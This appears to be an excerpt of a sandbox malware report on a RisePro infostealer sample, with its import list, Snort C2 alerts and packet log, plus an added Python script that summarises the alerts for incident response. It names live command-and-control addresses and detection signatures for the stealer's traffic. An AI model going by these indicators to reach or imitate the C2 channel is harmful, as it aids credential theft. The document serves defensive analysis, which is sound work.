None | 0x61f478 | 0x238 | empty | | | 0
None | 0x61f6b0 | 0x48 | empty | | | 0
None | 0x61f6f8 | 0x244 | empty | | | 0
None | 0x61f93c | 0x153 | empty | | | 0
None | 0x61fa90 | 0x305 | empty | | | 0
None | 0x61fd98 | 0x153 | empty | | | 0
None | 0x61feec | 0x353 | empty | | | 0
None | 0x620240 | 0x305 | empty | | | 0
None | 0x620548 | 0x13c | empty | | | 0
None | 0x620684 | 0x238 | empty | | | 0
None | 0x6208bc | 0x208 | empty | | | 0
None | 0x620ac4 | 0x238 | empty | | | 0
None | 0x620cfc | 0x238 | empty | | | 0
None | 0x620f34 | 0x208 | empty | | | 0
None | 0x62113c | 0x238 | empty | | | 0
None | 0x621374 | 0x553 | empty | | | 0
None | 0x6218c8 | 0x153 | empty | | | 0
None | 0x621a1c | 0x10d | empty | | | 0
None | 0x621b2c | 0x238 | empty | | | 0
None | 0x621d64 | 0x238 | empty | | | 0
None | 0x621f9c | 0x107 | empty | | | 0
None | 0x6220a4 | 0x11d | empty | | | 0
None | 0x6221c4 | 0x252 | empty | | | 0
None | 0x622418 | 0x46e | empty | | | 0
None | 0x622888 | 0x25e | empty | | | 0
DLL | Import
KERNEL32.dll | GetVersionExA
USER32.dll | wsprintfA
GDI32.dll | CreateCompatibleBitmap
ADVAPI32.dll | RegQueryValueExA
SHELL32.dll | ShellExecuteA
ole32.dll | CoInitialize
WS2_32.dll | WSAStartup
CRYPT32.dll | CryptUnprotectData
SHLWAPI.dll | PathFindExtensionA
gdiplus.dll | GdipGetImageEncoders
SETUPAPI.dll | SetupDiEnumDeviceInfo
ntdll.dll | RtlUnicodeStringToAnsiString
RstrtMgr.DLL | RmStartSession
KERNEL32.dll | HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/12/24-12:31:54.639253 | TCP | 2049660 | ET TROJAN RisePro CnC Activity (Outbound) | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
05/12/24-12:31:56.533300 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 50500 | 49724 | 5.42.96.65 | 192.168.2.5
05/12/24-12:30:54.955577 | TCP | 2049060 | ET TROJAN RisePro TCP Heartbeat Packet | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
05/12/24-12:31:54.793116 | TCP | 2046269 | ET TROJAN [ANY.RUN] RisePro TCP (Activity) | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
05/12/24-12:30:57.462316 | TCP | 2046267 | ET TROJAN [ANY.RUN] RisePro TCP (External IP) | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
05/12/24-12:30:59.409434 | TCP | 2046268 | ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
05/12/24-12:30:55.309898 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
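The script below is an added example, not part of the Joe Sandbox report and not Snort or Emerging Threats code. It takes the seven alert rows above, transcribed as pipe-delimited lines, and reduces them to one record per server endpoint, which is what a responder needs from this table: the C2 address and port, how many distinct client connections triggered rules, the set of rule IDs, and the time window. It assumes the sandbox host is the only private address in the capture; that is how client and server are told apart, since the ET rule direction labels do not line up with packet direction (the "(Outbound)" alert is on a server-to-client packet).

```python
# Added example (not from the Joe Sandbox report): per-server summary of the
# Snort alert rows in the report.
import ipaddress
from datetime import datetime

# Transcribed from the alert table above:
# timestamp | proto | sid | message | src port | dst port | src ip | dst ip
ALERT_ROWS = """\
05/12/24-12:31:54.639253 | TCP | 2049660 | ET TROJAN RisePro CnC Activity (Outbound) | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
05/12/24-12:31:56.533300 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 50500 | 49724 | 5.42.96.65 | 192.168.2.5
05/12/24-12:30:54.955577 | TCP | 2049060 | ET TROJAN RisePro TCP Heartbeat Packet | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
05/12/24-12:31:54.793116 | TCP | 2046269 | ET TROJAN [ANY.RUN] RisePro TCP (Activity) | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
05/12/24-12:30:57.462316 | TCP | 2046267 | ET TROJAN [ANY.RUN] RisePro TCP (External IP) | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
05/12/24-12:30:59.409434 | TCP | 2046268 | ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
05/12/24-12:30:55.309898 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
"""

# Ports where an outbound TCP session from a workstation is unremarkable.
COMMON_SERVER_PORTS = {25, 53, 80, 443, 465, 587, 993, 995}


def parse_alert(line):
    ts, proto, sid, msg, sport, dport, sip, dip = [f.strip() for f in line.split(" | ")]
    return {
        "time": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"),
        "proto": proto.lower(),
        "sid": int(sid),
        "msg": msg,
        "src": (sip, int(sport)),
        "dst": (dip, int(dport)),
    }


def split_endpoints(alert):
    """Return (client, server): the private address is the sandbox host."""
    src, dst = alert["src"], alert["dst"]
    return (src, dst) if ipaddress.ip_address(src[0]).is_private else (dst, src)


def summarize(rows=ALERT_ROWS):
    """Collapse alerts into one record per server endpoint ('ip:port')."""
    servers = {}
    for line in rows.strip().splitlines():
        alert = parse_alert(line)
        client, server = split_endpoints(alert)
        key = f"{server[0]}:{server[1]}"
        rec = servers.setdefault(key, {
            "proto": alert["proto"],
            "sids": set(), "messages": set(), "client_ports": set(),
            "alerts": 0, "first": None, "last": None,
            "non_standard_port": server[1] not in COMMON_SERVER_PORTS,
        })
        rec["sids"].add(alert["sid"])
        rec["messages"].add(alert["msg"])
        rec["client_ports"].add(client[1])      # one port per TCP connection
        rec["alerts"] += 1
        t = alert["time"]
        rec["first"] = t if rec["first"] is None else min(rec["first"], t)
        rec["last"] = t if rec["last"] is None else max(rec["last"], t)
    return servers


if __name__ == "__main__":
    for endpoint, rec in summarize().items():
        flag = " (non-standard port)" if rec["non_standard_port"] else ""
        print(f"{endpoint} {rec['proto']}{flag}: {rec['alerts']} alerts, "
              f"{len(rec['sids'])} rules, {len(rec['client_ports'])} connections, "
              f"{rec['first']:%H:%M:%S.%f} -> {rec['last']:%H:%M:%S.%f}")
        for msg in sorted(rec["messages"]):
            print("   ", msg)
```

Note that the rows are not in time order and that the Token rule fires on two different client ports (49706 and 49724), so the sample opened at least two TCP connections to the same C2 port within about a minute; the packet table that follows shows the first of them.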
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2024 12:30:54.583025932 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:30:54.946603060 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:30:54.946754932 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:30:54.955576897 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:30:55.309897900 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:30:55.355511904 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:30:55.366355896 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:30:57.462316036 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:30:57.511748075 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:30:57.682105064 CEST | 49707 | 443 | 192.168.2.5 | 34.117.186.192
May 12, 2024 12:30:57.682136059 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:57.682219028 CEST | 49707 | 443 | 192.168.2.5 | 34.117.186.192
May 12, 2024 12:30:57.683770895 CEST | 49707 | 443 | 192.168.2.5 | 34.117.186.192
May 12, 2024 12:30:57.683785915 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:57.874586105 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:30:57.874810934 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:30:58.019910097 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:58.020009995 CEST | 49707 | 443 | 192.168.2.5 | 34.117.186.192
May 12, 2024 12:30:58.022762060 CEST | 49707 | 443 | 192.168.2.5 | 34.117.186.192
May 12, 2024 12:30:58.022768974 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:58.023010969 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:58.070446014 CEST | 49707 | 443 | 192.168.2.5 | 34.117.186.192
May 12, 2024 12:30:58.112121105 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:58.288667917 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:30:58.392256975 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:58.392373085 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:58.392430067 CEST | 49707 | 443 | 192.168.2.5 | 34.117.186.192
May 12, 2024 12:30:58.394879103 CEST | 49707 | 443 | 192.168.2.5 | 34.117.186.192
May 12, 2024 12:30:58.394887924 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:58.394912004 CEST | 49707 | 443 | 192.168.2.5 | 34.117.186.192
May 12, 2024 12:30:58.394917965 CEST | 443 | 49707 | 34.117.186.192 | 192.168.2.5
May 12, 2024 12:30:58.562903881 CEST | 49708 | 443 | 192.168.2.5 | 172.67.75.166
May 12, 2024 12:30:58.562932968 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:58.563009977 CEST | 49708 | 443 | 192.168.2.5 | 172.67.75.166
May 12, 2024 12:30:58.563612938 CEST | 49708 | 443 | 192.168.2.5 | 172.67.75.166
May 12, 2024 12:30:58.563630104 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:58.900547981 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:58.900749922 CEST | 49708 | 443 | 192.168.2.5 | 172.67.75.166
May 12, 2024 12:30:58.903824091 CEST | 49708 | 443 | 192.168.2.5 | 172.67.75.166
May 12, 2024 12:30:58.903832912 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:58.904095888 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:58.905642033 CEST | 49708 | 443 | 192.168.2.5 | 172.67.75.166
May 12, 2024 12:30:58.948124886 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:59.407658100 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:59.407766104 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:59.407819033 CEST | 49708 | 443 | 192.168.2.5 | 172.67.75.166
May 12, 2024 12:30:59.408855915 CEST | 49708 | 443 | 192.168.2.5 | 172.67.75.166
May 12, 2024 12:30:59.408865929 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:59.408921003 CEST | 49708 | 443 | 192.168.2.5 | 172.67.75.166
May 12, 2024 12:30:59.408925056 CEST | 443 | 49708 | 172.67.75.166 | 192.168.2.5
May 12, 2024 12:30:59.409434080 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:30:59.813457012 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:30:59.840095043 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:00.218221903 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:00.261908054 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:00.277530909 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:00.659689903 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:00.659708023 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:00.659729004 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:00.659746885 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:00.659760952 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:00.659778118 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:00.659801006 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:00.715003967 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:01.132486105 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:01.725585938 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:01.777434111 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:01.808737993 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:02.225791931 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:02.282190084 CEST | 50500 | 49706 | 5.42.96.65 | 192.168.2.5
May 12, 2024 12:31:02.324261904 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:04.686219931 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
May 12, 2024 12:31:04.692372084 CEST | 49706 | 50500 | 192.168.2.5 | 5.42.96.65
                                                                        May 12, 2024 12:31:05.055609941 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.055695057 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.056546926 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.056718111 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.057099104 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.057152033 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.057801008 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.057848930 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.058087111 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.058137894 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.108766079 CEST4970980192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:05.116874933 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.116951942 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.419123888 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.419267893 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.419740915 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.419817924 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.419864893 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.419914961 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.420165062 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.420233011 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.420701981 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.420772076 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.420851946 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.420917034 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.480536938 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.480691910 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.782203913 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.782272100 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.782490969 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.782532930 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.782723904 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.782808065 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.782900095 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.782991886 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.783001900 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.783051968 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.783157110 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.783217907 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.783464909 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.783595085 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.783857107 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.783921003 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.783962011 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:05.843794107 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:05.843877077 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.121161938 CEST4970980192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:06.145416021 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.145436049 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.145517111 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.145697117 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.145756960 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.145823956 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.145865917 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.146064043 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.146078110 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.146094084 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.146140099 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.146147966 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.146195889 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.146281958 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.146327972 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.146549940 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.146621943 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.146794081 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.146806955 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.146836042 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.146847010 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.146940947 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.147006035 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.147047043 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.147100925 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.147263050 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.147277117 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.147329092 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.206888914 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.207036972 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.508476973 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.508562088 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.508652925 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.508722067 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.508872032 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.509238005 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.509289026 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.509310007 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.509398937 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.509414911 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.509490013 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.509980917 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.510034084 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.510132074 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.510231972 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.510248899 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.510356903 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.510399103 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.510454893 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.510552883 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.510620117 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.510623932 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.510634899 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.510704994 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.510704994 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.510767937 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.510849953 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.510940075 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.511090040 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.511136055 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.569978952 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.570046902 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.570113897 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:06.570192099 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.570211887 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.871660948 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.871912003 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.871938944 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.871988058 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.872301102 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.872456074 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.872472048 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.872561932 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.872694969 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.872709036 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.872930050 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.872946024 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873019934 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873070955 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873126984 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873291969 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873451948 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873466969 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873558044 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873783112 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873805046 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873980999 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.873996973 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.874166965 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.874290943 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.874423027 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.874543905 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.874856949 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.874962091 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.874977112 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.875125885 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.875207901 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.875324965 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.875447989 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.875521898 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.875709057 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.875799894 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.875922918 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.933114052 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:06.933336020 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:08.121160984 CEST4970980192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:12.136806011 CEST4970980192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:13.561352015 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:13.621161938 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:20.136806965 CEST4970980192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:27.378263950 CEST4971880192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:27.595968962 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:27.596120119 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:27.964931965 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:28.008243084 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:28.328427076 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:28.386831045 CEST4971880192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:30.402529955 CEST4971880192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:34.402486086 CEST4971880192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:36.996393919 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:37.371256113 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:37.402081013 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:37.449328899 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:37.734329939 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:42.402472973 CEST4971880192.168.2.5193.233.132.175
                                                                        May 12, 2024 12:31:49.008192062 CEST4971980192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:49.308464050 CEST8049719185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:49.308542967 CEST4971980192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:49.309426069 CEST4971980192.168.2.5185.199.220.53
                                                                        May 12, 2024 12:31:49.609405041 CEST8049719185.199.220.53192.168.2.5
                                                                        May 12, 2024 12:31:49.609438896 CEST8049719185.199.220.53192.168.2.5
